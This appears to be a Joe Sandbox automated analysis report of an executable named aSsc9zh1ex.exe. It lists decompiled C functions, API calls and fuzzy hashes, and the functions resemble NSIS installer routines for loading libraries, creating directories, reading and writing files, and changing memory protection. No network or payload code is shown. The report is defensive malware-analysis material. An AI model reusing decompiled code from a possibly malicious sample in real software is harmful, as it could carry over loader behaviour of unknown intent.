                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: CountFileNameTempTick
                        • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                        • API String ID: 1716503409-1857211195
                        • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                        • Instruction ID: d9a4429216a2c16f2b1e0ff0632edab8c7003fcac11a898ec3991e0c35e2d836
                        • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                        • Instruction Fuzzy Hash: 84F0F076B40204BFEB00CF59ED05E9EB7ACEB95750F01803AEE45F3140E6B099648768
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 951 4020d8-4020e4 952 4021a3-4021a5 951->952 953 4020ea-402100 call 402da6 * 2 951->953 955 4022f1-4022f6 call 401423 952->955 963 402110-40211f LoadLibraryExW 953->963 964 402102-40210e GetModuleHandleW 953->964 961 402c2a-402c39 955->961 962 40292e-402935 955->962 962->961 967 402121-402130 call 406956 963->967 968 40219c-40219e 963->968 964->963 964->967 971 402132-402138 967->971 972 40216b-402170 call 40557c 967->972 968->955 974 402151-402164 call 732d1817 971->974 975 40213a-402146 call 401423 971->975 976 402175-402178 972->976 978 402166-402169 974->978 975->976 985 402148-40214f 975->985 976->961 979 40217e-402188 call 403b69 976->979 978->976 979->961 984 40218e-402197 FreeLibrary 979->984 984->961 985->976
                        C-Code - Quality: 60%
                        			E004020D8(void* __ebx, void* __eflags) {
                        				struct HINSTANCE__* _t23;
                        				struct HINSTANCE__* _t31;
                        				void* _t32;
                        				WCHAR* _t35;
                        				intOrPtr* _t36;
                        				void* _t37;
                        				void* _t39;
                        
                        				_t32 = __ebx;
                        				asm("sbb eax, 0x7a8b20");
                        				 *(_t39 - 4) = 1;
                        				if(__eflags < 0) {
                        					_push(0xffffffe7);
                        					L15:
                        					E00401423();
                        					L16:
                        					 *0x7a8ae8 =  *0x7a8ae8 +  *(_t39 - 4);
                        					return 0;
                        				}
                        				_t35 = E00402DA6(0xfffffff0);
                        				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
                        				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
                        					L3:
                        					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
                        					_t47 = _t23 - _t32;
                        					 *(_t39 + 8) = _t23;
                        					if(_t23 == _t32) {
                        						_push(0xfffffff6);
                        						goto L15;
                        					}
                        					L4:
                        					_t36 = E00406956(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
                        					if(_t36 == _t32) {
                        						E0040557C(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
                        					} else {
                        						 *(_t39 - 4) = _t32;
                        						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
                        							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce28, 0x40a000); // executed
                        						} else {
                        							E00401423( *((intOrPtr*)(_t39 - 0x28)));
                        							if( *_t36() != 0) {
                        								 *(_t39 - 4) = 1;
                        							}
                        						}
                        					}
                        					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403B69( *(_t39 + 8)) != 0) {
                        						FreeLibrary( *(_t39 + 8));
                        					}
                        					goto L16;
                        				}
                        				_t31 = GetModuleHandleW(_t35); // executed
                        				 *(_t39 + 8) = _t31;
                        				if(_t31 != __ebx) {
                        					goto L4;
                        				}
                        				goto L3;
                        			}


                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
                          • Part of subcall function 0040557C: lstrlenW.KERNEL32(007A0F28,00000000,0079BD28,76F1EA30,?,?,?,?,?,?,?,?,?,004033F5,00000000,?), ref: 004055B4
                          • Part of subcall function 0040557C: lstrlenW.KERNEL32(004033F5,007A0F28,00000000,0079BD28,76F1EA30,?,?,?,?,?,?,?,?,?,004033F5,00000000), ref: 004055C4
                          • Part of subcall function 0040557C: lstrcatW.KERNEL32(007A0F28,004033F5), ref: 004055D7
                          • Part of subcall function 0040557C: SetWindowTextW.USER32(007A0F28,007A0F28), ref: 004055E9
                          • Part of subcall function 0040557C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040560F
                          • Part of subcall function 0040557C: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405629
                          • Part of subcall function 0040557C: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405637
                        • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
                        • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                        • String ID:
                        • API String ID: 334405425-0
                        • Opcode ID: d3289adf4ebaccc714292094f0131b2a55a31b2be69c8ba73e82ed6e367305b0
                        • Instruction ID: 444e3b163f15bd358be0b4800c507c2147bc3560cfb58e26f6c7225f93e15a3b
                        • Opcode Fuzzy Hash: d3289adf4ebaccc714292094f0131b2a55a31b2be69c8ba73e82ed6e367305b0
                        • Instruction Fuzzy Hash: D621D471904104FACF11AFA5CF48E9E7A71BF48354F20413BF505B91E1DBBD8A929A1D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			_entry_(intOrPtr _a4, intOrPtr _a8) {
                        
                        				 *0x732d5048 = _a4;
                        				if(_a8 == 1) {
                        					VirtualProtect(0x732d505c, 4, 0x40, 0x732d504c); // executed
                        					 *0x732d505c = 0xc2;
                        					 *0x732d504c = 0;
                        					 *0x732d5054 = 0;
                        					 *0x732d5068 = 0;
                        					 *0x732d5058 = 0;
                        					 *0x732d5050 = 0;
                        					 *0x732d5060 = 0;
                        					 *0x732d505e = 0;
                        				}
                        				return 1;
                        			}


                        APIs
                        • VirtualProtect.KERNELBASE(732D505C,00000004,00000040,732D504C), ref: 732D2A9D
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.886480223.00000000732D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 732D0000, based on PE: true
                        • Associated: 00000001.00000002.886476119.00000000732D0000.00000002.00000001.01000000.00000006.sdmp
                        • Associated: 00000001.00000002.886488080.00000000732D4000.00000002.00000001.01000000.00000006.sdmp
                        • Associated: 00000001.00000002.886506522.00000000732D6000.00000002.00000001.01000000.00000006.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_732d0000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: ProtectVirtual
                        • String ID: `gv@Mv
                        • API String ID: 544645111-3191811104
                        • Opcode ID: cb66390778465f57b447f6832e8d170f1eba3a299ca076a0f70dfd3d1012648d
                        • Instruction ID: 8e0f71f6806ed1ac4387cf764322acce11814247806c241965ae1ff6d98cc6fd
                        • Opcode Fuzzy Hash: cb66390778465f57b447f6832e8d170f1eba3a299ca076a0f70dfd3d1012648d
                        • Instruction Fuzzy Hash: FAF092F2D24280DEC350EF2AA4487093BE0B70D207B74C56AE19CD6241E3B440A4EB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 86%
                        			E004015C1(short __ebx, void* __eflags) {
                        				void* _t17;
                        				int _t23;
                        				void* _t25;
                        				signed char _t26;
                        				short _t28;
                        				short _t31;
                        				short* _t34;
                        				void* _t36;
                        
                        				_t28 = __ebx;
                        				 *(_t36 + 8) = E00402DA6(0xfffffff0);
                        				_t17 = E00405E94(_t16);
                        				_t32 = _t17;
                        				if(_t17 != __ebx) {
                        					do {
                        						_t34 = E00405E16(_t32, 0x5c);
                        						_t31 =  *_t34;
                        						 *_t34 = _t28;
                        						if(_t31 != _t28) {
                        							L5:
                        							_t25 = E00405AC8( *(_t36 + 8));
                        						} else {
                        							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                        							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405AE5(_t42) == 0) {
                        								goto L5;
                        							} else {
                        								_t25 = E00405A4B( *(_t36 + 8)); // executed
                        							}
                        						}
                        						if(_t25 != _t28) {
                        							if(_t25 != 0xb7) {
                        								L9:
                        								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                        							} else {
                        								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                        								if((_t26 & 0x00000010) == 0) {
                        									goto L9;
                        								}
                        							}
                        						}
                        						 *_t34 = _t31;
                        						_t32 = _t34 + 2;
                        					} while (_t31 != _t28);
                        				}
                        				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                        					_push(0xfffffff5);
                        					E00401423();
                        				} else {
                        					E00401423(0xffffffe6);
                        					E0040651A(0x7b4000,  *(_t36 + 8));
                        					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                        					if(_t23 == 0) {
                        						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                        					}
                        				}
                        				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t36 - 4));
                        				return 0;
                        			}


                        APIs
                          • Part of subcall function 00405E94: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,?,00405F08,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,76F1FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C46,?,76F1FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EA2
                          • Part of subcall function 00405E94: CharNextW.USER32(00000000), ref: 00405EA7
                          • Part of subcall function 00405E94: CharNextW.USER32(00000000), ref: 00405EBF
                        • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                          • Part of subcall function 00405A4B: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A8E
                        • SetCurrentDirectoryW.KERNELBASE(?,007B4000,?,00000000,000000F0), ref: 0040164D
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                        • String ID:
                        • API String ID: 1892508949-0
                        • Opcode ID: ea366b61ea7e0f954f802211c46f95b4e790a63d7230a0a8c72c366b88b3d3fb
                        • Instruction ID: b26d59bbbb8bd31aa62bfaa3988508fb5429084e49f4d8f394da2dab55023cb6
                        • Opcode Fuzzy Hash: ea366b61ea7e0f954f802211c46f95b4e790a63d7230a0a8c72c366b88b3d3fb
                        • Instruction Fuzzy Hash: E611E631504115EBCF216FA5CD40A9F36A0EF15369B28493BF541B52F1DA3E4A819F4D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 69%
                        			E00401389(signed int _a4, struct HWND__* _a10) {
                        				intOrPtr* _t6;
                        				void* _t8;
                        				void* _t10;
                        				signed int _t11;
                        				void* _t12;
                        				signed int _t16;
                        				signed int _t17;
                        
                        				_t17 = _a4;
                        				while(_t17 >= 0) {
                        					_t6 = _t17 * 0x1c +  *0x7a8a90;
                        					if( *_t6 == 1) {
                        						break;
                        					}
                        					_push(_t6); // executed
                        					_t8 = E00401434(); // executed
                        					if(_t8 == 0x7fffffff) {
                        						return 0x7fffffff;
                        					}
                        					_t10 = E0040136D(_t8);
                        					if(_t10 != 0) {
                        						_t11 = _t10 - 1;
                        						_t16 = _t17;
                        						_t17 = _t11;
                        						_t12 = _t11 - _t16;
                        					} else {
                        						_t12 = _t10 + 1;
                        						_t17 = _t17 + 1;
                        					}
                        					if(_a10 != 0) {
                        						 *0x7a7a4c =  *0x7a7a4c + _t12;
                        						SendMessageW(_a10, 0x402, MulDiv( *0x7a7a4c, 0x7530,  *0x7a7a34), 0); // executed
                        					}
                        				}
                        				return 0;
                        			}










                        APIs
                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                        • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID:
                        • API String ID: 3850602802-0
                        • Opcode ID: 0f992e2ae6cf3b1b8dd96a4b6b0adf3515dff43e38b3359cc4322e8ed16e10f0
                        • Instruction ID: 637f0bbede897030ab690e2e99e2181d797c58f7d0d2aab6e1f53bdf2be6ce4b
                        • Opcode Fuzzy Hash: 0f992e2ae6cf3b1b8dd96a4b6b0adf3515dff43e38b3359cc4322e8ed16e10f0
                        • Instruction Fuzzy Hash: 9501F432624220ABE7195B389D05B2A3698E751314F10C13FF955F69F1EA78CC02DB4D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                        • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: Window$EnableShow
                        • String ID:
                        • API String ID: 1136574915-0
                        • Opcode ID: 393b5c21bb7cc3de8bedbfe4bad105ee39a9eabd1884b7fb5bcfa8057cf0f7ce
                        • Instruction ID: 6c41119d880c6e907524726e204bf21ac727531236896e2a35a455d3971ed6d0
                        • Opcode Fuzzy Hash: 393b5c21bb7cc3de8bedbfe4bad105ee39a9eabd1884b7fb5bcfa8057cf0f7ce
                        • Instruction Fuzzy Hash: 62E01272908211CFE705EBA4EE495AE77B4EB40315710497FE501F11D1DBB94D00865D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E004068E7(signed int _a4) {
                        				struct HINSTANCE__* _t5;
                        				signed int _t10;
                        
                        				_t10 = _a4 << 3;
                        				_t8 =  *(_t10 + 0x40a3e0);
                        				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
                        				if(_t5 != 0) {
                        					L2:
                        					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
                        				}
                        				_t5 = E00406877(_t8); // executed
                        				if(_t5 == 0) {
                        					return 0;
                        				}
                        				goto L2;
                        			}





                        APIs
                        • GetModuleHandleA.KERNEL32(?,00000020,?,0040361A,0000000B), ref: 004068F9
                        • GetProcAddress.KERNEL32(00000000,?), ref: 00406914
                          • Part of subcall function 00406877: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040688E
                          • Part of subcall function 00406877: wsprintfW.USER32 ref: 004068C9
                          • Part of subcall function 00406877: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068DD
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                        • String ID:
                        • API String ID: 2547128583-0
                        • Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                        • Instruction ID: 6423a29397ed7bff7b22ace80297d9bc35d616ea5f013efbaa2f78a15a639a79
                        • Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                        • Instruction Fuzzy Hash: CEE08673504210AAE21196716E44C7773A89F89740316443FF946F2080D738DC359AAD
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 68%
                        			E0040600A(WCHAR* _a4, long _a8, long _a12) {
                        				signed int _t5;
                        				void* _t6;
                        
                        				_t5 = GetFileAttributesW(_a4); // executed
                        				asm("sbb ecx, ecx");
                        				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                        				return _t6;
                        			}





                        APIs
                        • GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\aSsc9zh1ex.exe,80000000,00000003,?,?,?,?,?,0040385A,?), ref: 0040600E
                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040385A,?), ref: 00406030
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: File$AttributesCreate
                        • String ID:
                        • API String ID: 415043291-0
                        • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                        • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                        • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                        • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00405FE5(WCHAR* _a4) {
                        				signed char _t3;
                        				signed char _t7;
                        
                        				_t3 = GetFileAttributesW(_a4); // executed
                        				_t7 = _t3;
                        				if(_t7 != 0xffffffff) {
                        					SetFileAttributesW(_a4, _t3 & 0x000000fe);
                        				}
                        				return _t7;
                        			}





                        APIs
                        • GetFileAttributesW.KERNELBASE(?,?,00405BEA,?,?,00000000,00405DC0,?,?,?,?), ref: 00405FEA
                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405FFE
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: AttributesFile
                        • String ID:
                        • API String ID: 3188754299-0
                        • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                        • Instruction ID: e4d3e829c0d5e7da9196b8d45c2199d6a51b20c6ab53065100e3d1aec4738abc
                        • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                        • Instruction Fuzzy Hash: 4CD01272504130BFC2102728EF0C89BBF95EF64375B024B35FAA5A22F0CB304C638A98
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00405AC8(WCHAR* _a4) {
                        				int _t2;
                        
                        				_t2 = CreateDirectoryW(_a4, 0); // executed
                        				if(_t2 == 0) {
                        					return GetLastError();
                        				}
                        				return 0;
                        			}




                        APIs
                        • CreateDirectoryW.KERNELBASE(?,00000000,004034FD,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00405ACE
                        • GetLastError.KERNEL32 ref: 00405ADC
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: CreateDirectoryErrorLast
                        • String ID:
                        • API String ID: 1375471231-0
                        • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                        • Instruction ID: 96bb703f3db892353912e36940962cdd7e9d34b0f70b6f3c067145efd4a10b7e
                        • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                        • Instruction Fuzzy Hash: 95C04C30344601AEDA105B219E48B1B7AD4DB50741F26853D6146F41A0EA788455DD3D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 28%
                        			E732D2B98(void* __ecx, intOrPtr _a4) {
                        				signed int _v8;
                        				void* _t28;
                        				void* _t29;
                        				int _t33;
                        				void* _t37;
                        				void* _t40;
                        				void* _t45;
                        				void* _t49;
                        				signed int _t56;
                        				void* _t61;
                        				void* _t70;
                        				intOrPtr _t72;
                        				signed int _t77;
                        				intOrPtr _t79;
                        				intOrPtr _t80;
                        				void* _t81;
                        				void* _t87;
                        				void* _t88;
                        				void* _t89;
                        				void* _t90;
                        				intOrPtr _t93;
                        				intOrPtr _t94;
                        
                        				if( *0x732d5050 != 0 && E732D2ADB(_a4) == 0) {
                        					 *0x732d5054 = _t93;
                        					if( *0x732d504c != 0) {
                        						_t93 =  *0x732d504c;
                        					} else {
                        						E732D30C0(E732D2AD5(), __ecx);
                        						 *0x732d504c = _t93;
                        					}
                        				}
                        				_t28 = E732D2B09(_a4);
                        				_t94 = _t93 + 4;
                        				if(_t28 <= 0) {
                        					L9:
                        					_t29 = E732D2AFD();
                        					_t72 = _a4;
                        					_t79 =  *0x732d5058;
                        					 *((intOrPtr*)(_t29 + _t72)) = _t79;
                        					 *0x732d5058 = _t72;
                        					E732D2AF7();
                        					_t33 = ReadFile(??, ??, ??, ??, ??); // executed
                        					 *0x732d5034 = _t33;
                        					 *0x732d5038 = _t79;
                        					if( *0x732d5050 != 0 && E732D2ADB( *0x732d5058) == 0) {
                        						 *0x732d504c = _t94;
                        						_t94 =  *0x732d5054;
                        					}
                        					_t80 =  *0x732d5058;
                        					_a4 = _t80;
                        					 *0x732d5058 =  *((intOrPtr*)(E732D2AFD() + _t80));
                        					_t37 = E732D2AE9(_t80);
                        					_pop(_t81);
                        					if(_t37 != 0) {
                        						_t40 = E732D2B09(_t81);
                        						if(_t40 > 0) {
                        							_push(_t40);
                        							_push(E732D2B14() + _a4 + _v8);
                        							_push(E732D2B1E());
                        							if( *0x732d5050 <= 0 || E732D2ADB(_a4) != 0) {
                        								_pop(_t88);
                        								_pop(_t45);
                        								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
                        								if(__eflags == 0) {
                        								}
                        								asm("loop 0xfffffff5");
                        							} else {
                        								_pop(_t89);
                        								_pop(_t49);
                        								 *0x732d504c =  *0x732d504c +  *(_t89 + _t49) * 4;
                        								asm("loop 0xffffffeb");
                        							}
                        						}
                        					}
                        					_t107 =  *0x732d5058;
                        					if( *0x732d5058 == 0) {
                        						 *0x732d504c = 0;
                        					}
                        					E732D2B42(_t107, _a4,  *0x732d5034,  *0x732d5038);
                        					return _a4;
                        				}
                        				_push(E732D2B14() + _a4);
                        				_t56 = E732D2B1A();
                        				_v8 = _t56;
                        				_t77 = _t28;
                        				_push(_t68 + _t56 * _t77);
                        				_t70 = E732D2B26();
                        				_t87 = E732D2B22();
                        				_t90 = E732D2B1E();
                        				_t61 = _t77;
                        				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
                        					_push( *((intOrPtr*)(_t70 + _t61)));
                        				}
                        				_push( *((intOrPtr*)(_t87 + _t61)));
                        				asm("loop 0xfffffff1");
                        				goto L9;
                        			}


























                        APIs
                        • ReadFile.KERNELBASE(00000000), ref: 732D2C57
                        Memory Dump Source
                        • Source File: 00000001.00000002.886480223.00000000732D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 732D0000, based on PE: true
                        • Associated: 00000001.00000002.886476119.00000000732D0000.00000002.00000001.01000000.00000006.sdmp
                        • Associated: 00000001.00000002.886488080.00000000732D4000.00000002.00000001.01000000.00000006.sdmp
                        • Associated: 00000001.00000002.886506522.00000000732D6000.00000002.00000001.01000000.00000006.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_732d0000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: FileRead
                        • String ID:
                        • API String ID: 2738559852-0
                        • Opcode ID: 8556496b55315d6a70f86a0124d8a4ac0e21d36ca608597d797b6b17bcad5469
                        • Instruction ID: f8fee7b55205c6d62d25447f47579b98b6e8b9ec56aee07d3e17eb3bf5968110
                        • Opcode Fuzzy Hash: 8556496b55315d6a70f86a0124d8a4ac0e21d36ca608597d797b6b17bcad5469
                        • Instruction Fuzzy Hash: 0341AEB293430DDFEB12EF65E988B497779EB48316F30C426E409C6144D7F998D0AB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0040608D(void* _a4, void* _a8, long _a12) {
                        				int _t7;
                        				long _t11;
                        
                        				_t11 = _a12;
                        				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                        				if(_t7 == 0 || _t11 != _a12) {
                        					return 0;
                        				} else {
                        					return 1;
                        				}
                        			}






                        APIs
                        • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034BF,00000000,00000000,00403306,000000FF,00000004,00000000,00000000,00000000), ref: 004060A1
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: FileRead
                        • String ID:
                        • API String ID: 2738559852-0
                        • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                        • Instruction ID: 9ce5220da9ed3c49ab8c05536da5923326b58a2142fda2ae973167115508ceb5
                        • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                        • Instruction Fuzzy Hash: 2DE08632140259ABCF119E518C00AEB376CFB05350F018472F911E2240D630E82187A5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E004060BC(void* _a4, void* _a8, long _a12) {
                        				int _t7;
                        				long _t11;
                        
                        				_t11 = _a12;
                        				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                        				if(_t7 == 0 || _t11 != _a12) {
                        					return 0;
                        				} else {
                        					return 1;
                        				}
                        			}






                        APIs
                        • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403475,00000000,00793700,000000FF,00793700,000000FF,000000FF,00000004,00000000), ref: 004060D0
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: FileWrite
                        • String ID:
                        • API String ID: 3934441357-0
                        • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                        • Instruction ID: ff7f98053b8daf8dc00d9e724bd7773b369301681fd057c4f0a19a08aea0fefc
                        • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                        • Instruction Fuzzy Hash: AEE0EC3225426AABDF10AF659C00AEB7BACFB15360F018437FA56E3190D631E83197A4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E004044C2(int _a4) {
                        				struct HWND__* _t2;
                        				long _t3;
                        
                        				_t2 =  *0x7a7a38;
                        				if(_t2 != 0) {
                        					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
                        					return _t3;
                        				}
                        				return _t2;
                        			}






                        APIs
